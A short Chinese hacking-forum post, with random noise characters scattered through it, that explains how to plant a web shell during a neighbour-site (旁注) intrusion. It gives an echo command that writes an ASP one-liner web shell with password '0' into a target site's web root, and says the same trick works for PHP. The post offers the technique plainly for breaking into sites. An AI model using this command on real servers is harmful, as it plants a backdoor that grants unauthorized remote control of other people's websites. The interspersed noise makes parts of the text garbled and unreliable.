在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
7 c3 ?2 F |% `( p. g' b
- U& i4 c' g/ U& g: V命令格式& x# J: j, l7 L2 ]- T/ o8 K
( O) h* X! `. V
Echo 语句 >目标站绝对目录- b$ m/ t1 {7 \# {0 M" E
; e% C+ G- Y/ n" B' x0 }# J' G
例如: 9 S/ P/ N. f( q+ y: x
x0 }. E, K$ B
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
, p& U1 n$ p1 C; t
9 O K* `" n% f+ s5 ~% L: o* Y: F这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。6 k, X) h4 L$ W# W" `. s
|